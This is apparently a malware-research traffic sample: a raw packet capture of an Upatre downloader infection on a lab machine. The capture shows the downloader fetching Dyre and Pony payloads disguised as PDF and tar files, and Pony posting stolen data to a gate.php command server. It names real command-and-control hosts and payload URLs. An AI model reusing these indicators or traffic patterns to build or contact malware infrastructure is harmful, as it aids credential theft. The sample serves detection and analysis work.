E-mail Spam Upatre Trojan Downloader Loads Dyre SSL/443 Trojan and Pony Downloader Malware PCAP Traffic Sample

July 1, 2015

2015-01-27 14:21:25.061276 IP 192.168.221.134.49500 > 202.153.35.133.15175: Flags [S], seq 1519016217, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.G@…_/……#..\;GZ.Y……. ……………..
2015-01-27 14:21:25.559710 IP 202.153.35.133.15175 > 192.168.221.134.49500: Flags [S.], seq 3577950926, ack 1519016218, win 64240, options [mss 1460], length 0
E..,……….#…..;G.\.C2.Z.Y.`…X}……..
2015-01-27 14:21:25.560035 IP 192.168.221.134.49500 > 202.153.35.133.15175: Flags [.], ack 1, win 64240, length 0
E..(.H@…_:……#..\;GZ.Y..C2.P…p:……..
2015-01-27 14:21:25.560178 IP 192.168.221.134.49500 > 202.153.35.133.15175: Flags [P.], seq 1:133, ack 1, win 64240, length 132
E….I@…^…….#..\;GZ.Y..C2.P…-…GET /2701uk12/WIN-BS4EUJ1KO34/0/61-SP1/0/ HTTP/1.1
User-Agent: Mazilla/5.0
Host: 202.153.35.133:15175
Cache-Control: no-cache
2015-01-27 14:21:25.560261 IP 202.153.35.133.15175 > 192.168.221.134.49500: Flags [.], ack 133, win 64240, length 0
E..(……….#…..;G.\.C2.Z.Y.P…o………
2015-01-27 14:21:26.074071 IP 202.153.35.133.15175 > 192.168.221.134.49500: Flags [FP.], seq 1, ack 133, win 64240, length 0
E..(……….#…..;G.\.C2.Z.Y.P…o………
2015-01-27 14:21:26.074471 IP 192.168.221.134.49500 > 202.153.35.133.15175: Flags [.], ack 2, win 64240, length 0
E..(.J@…_8……#..\;GZ.Y..C2.P…o………
2015-01-27 14:21:26.074847 IP 192.168.221.134.49500 > 202.153.35.133.15175: Flags [F.], seq 133, ack 2, win 64240, length 0
E..(.K@…_7……#..\;GZ.Y..C2.P…o………
2015-01-27 14:21:26.075108 IP 202.153.35.133.15175 > 192.168.221.134.49500: Flags [.], ack 134, win 64239, length 0
E..(……….#…..;G.\.C2.Z.Y.P…o………
2015-01-27 14:21:26.075658 IP 192.168.221.134.49501 > 202.153.35.133.15175: Flags [S], seq 2464773655, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.L@…_*……#..];G..v……. ..”…………..
2015-01-27 14:21:26.827991 IP 202.153.35.133.15175 > 192.168.221.134.49501: Flags [S.], seq 2325778595, ack 2464773656, win 64240, options [mss 1460], length 0
E..,……….#…..;G.]……v.`………….
2015-01-27 14:21:26.828114 IP 192.168.221.134.49501 > 202.153.35.133.15175: Flags [.], ack 1, win 64240, length 0
E..(.M@…_5……#..];G..v…..P………….
2015-01-27 14:21:26.828704 IP 192.168.221.134.49501 > 202.153.35.133.15175: Flags [P.], seq 1:128, ack 1, win 64240, length 127
E….N@…^…….#..];G..v…..P…….GET /2701uk12/WIN-BS4EUJ1KO34/1/0/0/ HTTP/1.1
User-Agent: Mazilla/5.0
Host: 202.153.35.133:15175
Cache-Control: no-cache
2015-01-27 14:21:26.828767 IP 202.153.35.133.15175 > 192.168.221.134.49501: Flags [.], ack 128, win 64240, length 0
E..(……….#…..;G.]……v.P….+……..
2015-01-27 14:21:27.440822 IP 202.153.35.133.15175 > 192.168.221.134.49501: Flags [R.], seq 1, ack 128, win 64240, length 0
E..(……….#…..;G.]……v.P….’……..
2015-01-27 14:21:27.442418 IP 192.168.221.134.55462 > 192.168.221.2.53: 31595+ A? best-synthetic-motor-oil.com. (46)
E..J.O…..y………..5.6Z.{k………..best-synthetic-motor-oil.com…..
2015-01-27 14:21:27.527315 IP 192.168.221.2.53 > 192.168.221.134.55462: 31595 1/0/0 A 192.163.217.66 (62)
E..Z……………..5…F..{k………..best-synthetic-motor-oil.com………………..B
2015-01-27 14:21:27.528955 IP 192.168.221.134.49502 > 192.163.217.66.80: Flags [S], seq 3826675915, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.P@….^…….B.^.P..p……. ..p…………..
2015-01-27 14:21:28.875176 IP 192.163.217.66.80 > 192.168.221.134.49502: Flags [S.], seq 1331588575, ack 3826675916, win 64240, options [mss 1460], length 0
E..,………..B…..P.^O^m…p.`….@……..
2015-01-27 14:21:28.875303 IP 192.168.221.134.49502 > 192.163.217.66.80: Flags [.], ack 1, win 64240, length 0
E..(.Q@….i…….B.^.P..p.O^m.P………….
2015-01-27 14:21:28.875474 IP 192.168.221.134.49502 > 192.163.217.66.80: Flags [P.], seq 1:148, ack 1, win 64240, length 147
E….R@…………B.^.P..p.O^m.P… …GET /file_k12.pdf HTTP/1.1
Accept: text/*, application/*
User-Agent: Mazilla/5.0
Host: best-synthetic-motor-oil.com
Cache-Control: no-cache

2015-01-27 14:21:32.155348 IP 192.163.217.66.80 > 192.168.221.134.49502: Flags [P.], seq 1:1356, ack 148, win 64240, length 1355
E..s………..B…..P.^O^m…q_P…….HTTP/1.1 200 OK
Date: Tue, 27 Jan 2015 18:21:30 GMT
Server: Apache
Accept-Ranges: bytes
Content-Length: 438781
Cache-Control: max-age=290304000, public
Expires: Tue, 27 Jan 2015 18:21:31 GMT
Vary: User-Agent
Content-Type: application/pdf

~ .0…4. .j~
… .&V.sT…h….H+…(vL.>…..x….(….z….j……UN…/.A$…Z…t..6.I+r…-..N……….v?@(.M>.I…”..U…jZ…|Gd..J…….(.O..PH.+d.2z9.K……..`….X..W.c.Vd?.
c……f…..
.8lL.8ct.?..Fh…\. G…..)oz$.}k…..{\….D.y….~P(}.!.. .=.cF.’.Gh..Cy. ..-..T…=…@tL…=.%…8.O…bGH.
….2…Oy.
..s.-io
gh..2.Y..`.
G.N.-ld
Wh.bGx.
…..`.
G.l……….nE….
G.\..n…/Q..1H..io..%…d7..e.HK:..o.U..C..:..HKk.]..’bGx$
.?..Oy&
.7.HSkm….@W..~N.-.@.kC2…o1g…j….
Gh2O…..d0O.8..Gy5
.-…x4O..}….MC(..2\..D-….;.Gh>.3o…h@.Bk…(..2….xD
…O..F1….2…..=2.hJ
..L/..L
.mNO.(.Z……@
G.WZ./B …….O.k.S.`.L……L.@….6……|-.~.;….u……….ha

Gh`….LCC.[..n…..A…D…Og…8./.go…….m.A.h ..wU..8..1..2.(.2.”`E.u.Gh……Vhx…v..nu.?|.._k.[..|.B.;..k.Ms…l.
.D%f.
…./….T…W……l….i\.:u…..Vh.S…C2….-k1……..wh.
…EO….(…p..D-{…]…AS.W;….0$).b..;../.=……g]..*0?.k.0.e..i…Y.\j.D..h.P.h.
Gh+.GXU.Gh.
.E.
.l..G…Iw..Ih…I
F$.+…yGH.x(..k*h.i&..e3H.h”H..)H.
)H.E.H.e…$Je..C..Ecqo…=KBk…..
@j.7….T.:Zvj…a.)

2015-01-27 14:21:42.275270 IP 192.168.221.134.49503 > 202.153.35.133.15128: Flags [.], ack 1, win 64240, length 0
E..(..@…^…….#.._;.w…….P………….
2015-01-27 14:21:42.275614 IP 192.168.221.134.49503 > 202.153.35.133.15128: Flags [P.], seq 1:129, ack 1, win 64240, length 128
E…..@…^…….#.._;.w…….P….e..GET /2701uk12/WIN-BS4EUJ1KO34/41/7/4/ HTTP/1.1
User-Agent: Mazilla/5.0
Host: 202.153.35.133:15128
Cache-Control: no-cache
2015-01-27 14:21:42.275623 IP 202.153.35.133.15128 > 192.168.221.134.49503: Flags [.], ack 129, win 64240, length 0
E..(……….#…..;.._….w..oP………….
2015-01-27 14:21:42.699373 IP 202.153.35.133.15128 > 192.168.221.134.49503: Flags [R.], seq 1, ack 129, win 64240, length 0
E..(……….#…..;.._….w..oP………….
2015-01-27 14:21:43.517033 IP 192.168.221.134.49502 > 192.163.217.66.80: Flags [R.], seq 148, ack 439032, win 0, length 0
E..(..@…………B.^.P..q_Oe .P….Y……..
2015-01-27 14:21:48.066629 IP 192.168.221.134.54585 > 192.168.221.2.53: 2357+ A? google.com. (28)
E..8……………..9.5.$.n 5………..google.com…..
2015-01-27 14:21:48.113817 IP 192.168.221.2.53 > 192.168.221.134.54585: 2357 6/0/0 A 64.233.181.139, A 64.233.181.101, A 64.233.181.138, A 64.233.181.100, A 64.233.181.102, A 64.233.181.113 (124)
E………………..5.9.. i 5………..google.com……………..@……………@..e…………@……………@..d…………@..f…………@..q
2015-01-27 14:21:48.116867 IP 192.168.221.134.49504 > 64.233.181.139.80: Flags [S], seq 2281313745, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…V6….@….`.P………. .Z……………
2015-01-27 14:21:48.196170 IP 64.233.181.139.80 > 192.168.221.134.49504: Flags [S.], seq 3168605148, ack 2281313746, win 64240, options [mss 1460], length 0
E..,…….4@……..P.`……..`….J……..
2015-01-27 14:21:48.196483 IP 64.233.181.139.80 > 192.168.221.134.49504: Flags [.], ack 2, win 64239, length 0
E..(…….7@……..P.`……..P………….
2015-01-27 14:21:48.197151 IP 192.168.221.134.53085 > 192.168.221.2.53: 54005+ A? s2.taraba.net. (31)
E..;……………..].5.’7…………..s2.taraba.net…..
2015-01-27 14:21:48.269890 IP 64.233.181.139.80 > 192.168.221.134.49504: Flags [FP.], seq 1, ack 2, win 64239, length 0
E..(…….6@……..P.`……..P………….
2015-01-27 14:21:48.270039 IP 192.168.221.134.49504 > 64.233.181.139.80: Flags [.], ack 2, win 64240, length 0
E..(..@…V>….@….`.P……..P………….
2015-01-27 14:21:48.319596 IP 192.168.221.2.53 > 192.168.221.134.53085: 54005 1/0/0 A 208.91.197.54 (47)
E..K……………..5.].7……………s2.taraba.net………………[.6
2015-01-27 14:21:48.320097 IP 192.168.221.134.20507 > 208.91.197.54.3478: UDP, length 20
E..0………….[.6P………..”ZZ………….
2015-01-27 14:21:48.629979 IP 192.168.221.134.20507 > 208.91.197.54.3478: UDP, length 20
E..0..@……….[.6P………..”ZZ………….
2015-01-27 14:21:49.332995 IP 192.168.221.134.20507 > 208.91.197.54.3478: UDP, length 20
E..0..@….
…..[.6P………..”ZZ………….
2015-01-27 14:21:50.849759 IP 192.168.221.134.20507 > 208.91.197.54.3478: UDP, length 20
E..0..@…. …..[.6P………..”ZZ………….
2015-01-27 14:21:53.963718 IP 192.168.221.134.20507 > 208.91.197.54.3478: UDP, length 20
E..0..@……….[.6P………..”ZZ………….
2015-01-27 14:21:58.675180 IP 192.168.221.134.20507 > 208.91.197.54.3478: UDP, length 20
E..0..@……….[.6P………..”ZZ………….
2015-01-27 14:22:04.980868 IP 192.168.221.134.63862 > 192.168.221.2.53: 9458+ A? stun2.l.google.com. (36)
E..@……………..v.5.,..$…………stun2.l.google.com…..
2015-01-27 14:22:05.110800 IP 192.168.221.2.53 > 192.168.221.134.63862: 9458 1/0/0 A 173.194.67.127 (52)
E..P……………..5.v.<u.$…………stun2.l.google.com……………….C.
2015-01-27 14:22:05.111455 IP 192.168.221.134.20507 > 173.194.67.127.19302: UDP, length 20
E..0…….V……C.P.Kf……….Z.%…%.I…..
2015-01-27 14:22:05.418524 IP 192.168.221.134.20507 > 173.194.67.127.19302: UDP, length 20
E..0..@…[U……C.P.Kf……….Z.%…%.I…..
2015-01-27 14:22:05.475524 IP 173.194.67.127.19302 > 192.168.221.134.20507: UDP, length 32
E..<…….G..C…..KfP..(h…….Z.%…%.I………….B.C.
2015-01-27 14:22:05.483145 IP 192.168.221.134.59813 > 192.168.221.2.53: 10886+ A? google.com. (28)
E..8……………….5.$..*…………google.com…..
2015-01-27 14:22:05.530146 IP 192.168.221.2.53 > 192.168.221.134.59813: 10886 6/0/0 A 74.125.207.100, A 74.125.207.138, A 74.125.207.102, A 74.125.207.139, A 74.125.207.101, A 74.125.207.113 (124)
E………………..5…..2*…………google.com……………..J}.d…………J}…………..J}.f…………J}…………..J}.e…………J}.q
2015-01-27 14:22:05.532828 IP 192.168.221.134.49505 > 74.125.207.100.80: Flags [S], seq 2079037603, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@…2…..J}.d.a.P{……… ……………..
2015-01-27 14:22:05.555112 IP 173.194.67.127.19302 > 192.168.221.134.20507: UDP, length 32
E..<…….E..C…..KfP..(h…….Z.%…%.I………….B.C.
2015-01-27 14:22:05.594500 IP 74.125.207.100.80 > 192.168.221.134.49505: Flags [S.], seq 3089411234, ack 2079037604, win 64240, options [mss 1460], length 0
E..,……m.J}.d…..P.a.$..{…`………….
2015-01-27 14:22:05.594740 IP 192.168.221.134.49505 > 74.125.207.100.80: Flags [.], ack 1, win 64240, length 0
E..(..@…2…..J}.d.a.P{….$..P………….
2015-01-27 14:22:05.594875 IP 192.168.221.134.49505 > 74.125.207.100.80: Flags [F.], seq 1, ack 1, win 64240, length 0
E..(..@…2…..J}.d.a.P{….$..P………….
2015-01-27 14:22:05.594984 IP 74.125.207.100.80 > 192.168.221.134.49505: Flags [.], ack 2, win 64239, length 0
E..(……m.J}.d…..P.a.$..{…P………….
2015-01-27 14:22:05.723241 IP 74.125.207.100.80 > 192.168.221.134.49505: Flags [FP.], seq 1, ack 2, win 64239, length 0
E..(……m.J}.d…..P.a.$..{…P………….
2015-01-27 14:22:05.723386 IP 192.168.221.134.49505 > 74.125.207.100.80: Flags [.], ack 2, win 64240, length 0
E..(..@…2…..J}.d.a.P{….$..P………….
2015-01-27 14:22:12.916616 IP 192.168.221.134.49506 > 91.222.152.182.443: Flags [S], seq 2368281210, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…W…..[….b…).z…… .Q……………
2015-01-27 14:22:13.186740 IP 91.222.152.182.443 > 192.168.221.134.49506: Flags [R.], seq 2401765140, ack 2368281211, win 64240, length 0
E..(……..[……….b.(…).{P…!………
2015-01-27 14:22:13.700811 IP 192.168.221.134.49506 > 91.222.152.182.443: Flags [S], seq 2368281210, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4..@…W…..[….b…).z…… .Q……………
2015-01-27 14:22:13.992066 IP 91.222.152.182.443 > 192.168.221.134.49506: Flags [S.], seq 430933093, ack 2368281211, win 64240, options [mss 1460], length 0
E..,……..[……….b…e.).{`………….
2015-01-27 14:22:13.992191 IP 192.168.221.134.49506 > 91.222.152.182.443: Flags [.], ack 1, win 64240, length 0
E..(. @…X…..[….b…).{…fP….H……..
2015-01-27 14:22:13.993641 IP 192.168.221.134.49506 > 91.222.152.182.443: Flags [P.], seq 1:105, ack 1, win 64240, length 104
E….
@…W…..[….b…).{…fP………..c…_..T..V….h…._.&4y..vf…Y..ciA…../.5…
[……….b…f.)..P………….
2015-01-27 14:22:14.313965 IP 91.222.152.182.443 > 192.168.221.134.49506: Flags [P.], seq 1:1349, ack 105, win 64240, length 1348
E..l……..[……….b…f.)..P…Gt……Y…U..T..V.8.LY..r.B.&X>6R..p”.W..q.0′ .x.h..y.Z….l……..v^o.+…”8……………………………0…0..l. …~ns…0.. *.H……..0..1.0 ..U….CN1.0 ..U….ST1!0…U….XEEHxhNPi4JnkT0t4vDCP77f1!0…U.
..KnOC0dLyJvPsFSC3HVIjHULk1!0…U….xxLNz36tY9YWyQIc289ejf2V0…150127155718Z..160127155718Z0..1.0 ..U….CN1.0 ..U….ST1!0…U….XEEHxhNPi4JnkT0t4vDCP77f1!0…U.
..KnOC0dLyJvPsFSC3HVIjHULk1!0…U….xxLNz36tY9YWyQIc289ejf2V0..”0.. *.H………….0..
……………Bh.Jm..D$t..o..NqwT…3Z.+.H.l&$……”P.K.s..{.Ro.>…~,0wk.;\1….K.Q*.N.p.4……C…LQxG.
….+…q.y….9.”@~…. ….~lr@…<../.1……T…………..7J…q…~q..+.rPT…B.J..of……%.R.2W.g.o..yj.$..6p…..E.l…8p3..]…^……..#.P^v……0.. *.H…………….9….pso){…nM..u.
..m..c .!f ~X..=..W…..?…….Y’.Nu.?.{$B8.B.{.r8…..r7…..).L@..Qa…
P.4.b.U…5..<.pm.;.n.^.4(.’…5../.Il.I_[].s.H\-tn……P…………B…w………………s.nT….7.)..”G%h…r….w>….8.’)H….’..V..T.5…[..7…Lc……..K…G…A.]$….N@.5.-…….”…… ……..>t….hxQ……….G…….m…..@..#………..A…..<.
Z.+}.N……..G…….7…. l.X..-..k…v.<..M….YG…..6………..7…….oWK…DF..z”|….3……}.{.W……4…K.|.=.go)…..L…S….Cff=Dk.`..}*…….u..#A.J.S.&.Z..v.tF75..L>w.k…$~..F….x.dW…..Y…1…[#.-G …..-..
2015-01-27 14:22:14.314002 IP 91.222.152.182.443 > 192.168.221.134.49506: Flags [P.], seq 1349:1359, ack 105, win 64240, length 10
E..2……..[……….b…..)..P…{n…………
2015-01-27 14:22:14.314140 IP 192.168.221.134.49506 > 91.222.152.182.443: Flags [.], ack 1359, win 62882, length 0
2015-01-27 14:22:24.993058 IP 91.222.152.182.443 > 192.168.221.134.49508: Flags [P.], seq 1:1349, ack 137, win 64240, length 1348
E..l.<……[……….d.O./….P………..Y…U..T.._.g_.zta$S
.r….*.*Cm.AA..C. …..up.:\} ?….l.g..R.[Hy..pQA……………………………0…0..l. …~ns…0.. *.H……..0..1.0 ..U….CN1.0 ..U….ST1!0…U….XEEHxhNPi4JnkT0t4vDCP77f1!0…U.
..KnOC0dLyJvPsFSC3HVIjHULk1!0…U….xxLNz36tY9YWyQIc289ejf2V0…150127155718Z..160127155718Z0..1.0 ..U….CN1.0 ..U….ST1!0…U….XEEHxhNPi4JnkT0t4vDCP77f1!0…U.
..KnOC0dLyJvPsFSC3HVIjHULk1!0…U….xxLNz36tY9YWyQIc289ejf2V0..”0.. *.H………….0..
……………Bh.Jm..D$t..o..NqwT…3Z.+.H.l&$……”P.K.s..{.Ro.>…~,0wk.;\1….K.Q*.N.p.4……C…LQxG.
….+…q.y….9.”@~…. ….~lr@…<../.1……T…………..7J…q…~q..+.rPT…B.J..of……%.R.2W.g.o..yj.$..6p…..E.l…8p3..]…^……..#.P^v……0.. *.H…………….9….pso){…nM..u.
..m..c .!f ~X..=..W…..?…….Y’.Nu.?.{$B8.B.{.r8…..r7…..).L@..Qa…
P.4.b.U…5..<.pm.;.n.^.4(.’…5../.Il.I_[].s.H\-tn……P…………B…w………………s.nT….7.)..”G%h…r….w>….8.’)H….’..V..T.5…[..7…Lc……..K…G…A.zG.?.y{…..m….*.#.(w……P2. Ro[7……YW.$.W…T..
..BnTX……..h/|!V…….q(n.@p..-.8?…z.I.pidp..@.g..3b[>|..)..p.1…..:…f5+..z……Z…..M`..GG..A:Gl…..[.<B.4……9.Y….&%Q.~E._!gm……….S^…iA..s.K…..M..NX…y.Z…}….g…\..@.[>.. .e.0…… x.)`..Yx….ql7..A….P….=.J.c…e.O..^l…$…..
2015-01-27 14:22:27.738737 IP 192.168.221.134.49511 > 78.143.39.41.80: Flags [.], ack 1, win 64240, length 0
E..(.Q@………N.’).g.PI…….P…GZ……..
2015-01-27 14:22:27.738980 IP 192.168.221.134.49511 > 78.143.39.41.80: Flags [P.], seq 1:185, ack 1, win 64240, length 184
E….R@………N.’).g.PI…….P…<…GET /mandoc/ml1from1.tar HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Host: zac-buero.de
2015-01-27 14:22:27.934161 IP 192.168.221.134.49512 > 91.222.152.182.443: Flags [S], seq 386420347, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.W@…W…..[….h….N{…… ……………..
2015-01-27 14:22:28.038367 IP 78.143.39.41.80 > 192.168.221.134.49511: Flags [P.], seq 1:1368, ack 185, win 64240, length 1367
E….~……N.’)…..P.g….I…P….e..HTTP/1.1 200 OK
Date: Tue, 27 Jan 2015 18:22:43 GMT
Server: Apache/2.2.16
Last-Modified: Tue, 27 Jan 2015 12:05:10 GMT
ETag: "3f6b96-6e540-50da111052980"
Accept-Ranges: bytes
Content-Length: 451904
Content-Type: application/x-tar
2015-01-27 14:22:29.878174 IP 37.59.30.125.443 > 192.168.221.134.49515: Flags [P.], seq 1:970, ack 105, win 64240, length 969
E………>D%;.}…….k
…..3.P………..Y…U..T..g…y..[i..tb…,b..H.t…!6. .h….g.J..y..G.@OYw.>,.P.-b…#……………………………0…0…. ….EL.R.0.. *.H……..0..1.0 ..U….CN1.0 ..U….ST1!0…U….dge0X2vrqrAtNru4iNGtb2F81!0…U.
..XLjz9UG5P7cAyVZGkOB2UW6n1!0…U….kUXskeWSY9DjX8YZNxJQrUWR0…150127104529Z..160122104529Z0..1.0 ..U….CN1.0 ..U….ST1!0…U….dge0X2vrqrAtNru4iNGtb2F81!0…U.
..XLjz9UG5P7cAyVZGkOB2UW6n1!0…U….kUXskeWSY9DjX8YZNxJQrUWR0..0.. *.H…………0…….G+…%.>B…………..K……M.)0..v.#…D……. ..w.$…c….3…FQ..w..$A.1h..K….M.@…lTm……a…..:..{ZH…58LSO..r.u…..0.. *.H…………t…m”.x…c,……..L…..x.1….Y….H.W…………j.Q.6.x.o3….u.t5…k.},…….%..M…..%.Yw.N>….2…i..`\.;..K..{..m…………..A.\…z.9..T..%d.h..7=..N..Z.v..,…….L.;……’..rv.[..yz.ZY.=….l…..q.b.O…..}…>K.R.Sl…fx..P.-…….[k….. ..%..W…#..R.D(..%..8…….c h.r0.Ay.!…w }..6..|J…….t……..o..w………..
2015-01-27 14:22:33.930003 IP 192.168.221.134.53751 > 192.168.221.2.53: 52590+ A? shopmeyermusic.com. (36)
E..@.D……………..5.,\..n………..shopmeyermusic.com…..
2015-01-27 14:22:34.031261 IP 91.222.152.182.443 > 192.168.221.134.49520: Flags [P.], seq 1418:1759, ack 580, win 64240, length 341
E..}.Q…..f[……….p.z._.:..P………..Pp;.V.l…?0……q.”….DI…\[…+…sE.fv.+8….g…R…]k8.4.H.sY<u……….s..]&#…$..MR.u..a\….e…zw.h:+d)……Y.F..$…w……..V…|.=..X/~…>.S..’….~..<…D].G.k..W(……_.i..K%.’…V.]{……I.vQT..-.TU.{..B .Y..).(….E
x…….7-.B.y….+;…….z4,.m.e… …..G..”l.9y…Yl.{….w.#? ..’-..^.^h.)….>.c..x.r.3^ .
2015-01-27 14:22:34.031443 IP 192.168.221.134.49520 > 91.222.152.182.443: Flags [.], ack 1759, win 64240, length 0
E..(.E@…V…..[….p…:…z..P…U………
2015-01-27 14:22:34.057951 IP 192.168.221.2.53 > 192.168.221.134.53751: 52590 1/0/0 A 72.167.2.191 (52)
E..P.R…..p………5…<.o.n………..shopmeyermusic.com……………..H…
2015-01-27 14:22:34.058411 IP 192.168.221.134.49523 > 72.167.2.191.80: Flags [S], seq 3306252340, win 8192, options [mss 1460,nop,wscale 2,nop,nop,sackOK], length 0
E..4.F@………H….s.P..h4…… .vw…………..
2015-01-27 14:22:34.072448 IP 37.59.30.125.443 > 192.168.221.134.49522: Flags [S.], seq 159891081, ack 883821133, win 64240, options [mss 1460], length 0
E..,.S….A.%;.}…….r …4.
M`………….
2015-01-27 14:22:34.072520 IP 192.168.221.134.49522 > 37.59.30.125.443: Flags [.], ack 1, win 64240, length 0
E..(.G@………%;.}.r..4.
M …P………….
2015-01-27 14:22:34.072955 IP 192.168.221.134.49522 > 37.59.30.125.443: Flags [P.], seq 1:137, ack 1, win 64240, length 136
E….H@………%;.}.r..4.
M …P…p…………..T..j…Cyc…5~.t0\\]{}&.q.W{… .h….g.J..y..G.@OYw.>,.P.-b…#…/.5…
….. .
.2.8…………………..
…………..
2015-01-27 14:22:34.072966 IP 37.59.30.125.443 > 192.168.221.134.49522: Flags [.], ack 137, win 64240, length 0
E..(.T….A.%;.}…….r …4.
.P….:……..
2015-01-27 14:22:34.116784 IP 72.167.2.191.80 > 192.168.221.134.49523: Flags [S.], seq 1659163434, ack 3306252341, win 64240, options [mss 1460], length 0
E..,.U….9.H……..P.sb..*..h5`….v……..
2015-01-27 14:22:34.116916 IP 192.168.221.134.49523 > 72.167.2.191.80: Flags [.], ack 1, win 64240, length 0
E..(.I@………H….s.P..h5b..+P….3……..
2015-01-27 14:22:34.117083 IP 192.168.221.134.49523 > 72.167.2.191.80: Flags [P.], seq 1:185, ack 1, win 64240, length 184
E….J@….8….H….s.P..h5b..+P…{S..GET /boa/pony1.tar HTTP/1.1
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.71 Safari/537.36
Host: shopmeyermusic.com
2015-01-27 14:22:34.180683 IP 72.167.2.191.80 > 192.168.221.134.49523: Flags [P.], seq 1:1356, ack 185, win 64240, length 1355
E..s.W….4.H……..P.sb..+..h.P…….HTTP/1.1 200 OK
Date: Tue, 27 Jan 2015 18:22:34 GMT
Server: Apache
Last-Modified: Tue, 27 Jan 2015 16:20:24 GMT
ETag: "1c140-50da4a1db3c2b"
Accept-Ranges: bytes
Content-Length: 115008
Content-Type: application/x-tar
2015-01-27 14:22:34.966373 IP 192.168.221.134.49522 > 37.59.30.125.443: Flags [.], ack 64714, win 64240, length 0
E..(..@….\….%;.}.r..4… ..SP… ………
2015-01-27 14:22:34.967377 IP 192.168.221.134.49525 > 83.219.133.225.81: Flags [P.], seq 1:413, ack 1, win 64240, length 412
E…..@…o…..S….u.Q..Y]L..qP…
…POST /dffgbDFGvf465/gate.php HTTP/1.0
Host: 83.219.133.225
Accept: */*
Accept-Encoding: identity, *;q=0
Accept-Language: en-US
Content-Length: 199
Content-Type: application/octet-stream
Connection: close
Content-Encoding: binary
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0)
2015-01-27 14:22:35.469024 IP 83.219.133.225.81 > 192.168.221.134.49525: Flags [FP.], seq 1:177, ack 612, win 64240, length 176
E……….lS……..Q.uL..q..[.P….$..HTTP/1.1 200 OK
Server: nginx/1.2.1
Date: Tue, 27 Jan 2015 18:22:29 GMT
Content-Type: text/html
Connection: close
X-Powered-By: PHP/5.4.36-0+deb7u3

…..L…dps.VQ5.C.&
2015-01-27 14:22:39.235925 IP 192.168.221.134.49523 > 72.167.2.191.80: Flags [.], ack 115236, win 64240, length 0
E..(..@….p….H….s.P..h.b..NP….V……..
2015-01-27 14:22:39.277350 IP 192.168.221.134.56474 > 192.168.221.2.53: 11065+ A? i2p.mooo.com. (30)
E..:……………….5.&..+9………..i2p.mooo.com…..
2015-01-27 14:22:39.278092 IP 192.168.221.134.63043 > 192.168.221.2.53: 44213+ A? i2p.mooo.com. (30)
E..:……………..C.5.&6m………….i2p.mooo.com…..
2015-01-27 14:22:39.336460 IP 192.168.221.2.53 > 192.168.221.134.56474: 11065 1/0/0 A 95.25.71.144 (46)
E..J.?……………5…6./+9………..i2p.mooo.com…………….._.G.
2015-01-27 14:22:39.338263 IP 192.168.221.134.49529 > 95.25.71.144.443: Flags [S], seq 1859497569, win 8192, options [mss 1460,nop,wscale 8,nop,nop,sackOK], length 0
E..4..@………_.G..y..n..a…… .)……………
2015-01-27 14:22:39.355342 IP 192.168.221.2.53 > 192.168.221.134.63043: 44213 1/0/0 A 95.25.71.144 (46)
E..J.@……………5.C.6O
………….i2p.mooo.com…………….._.G.
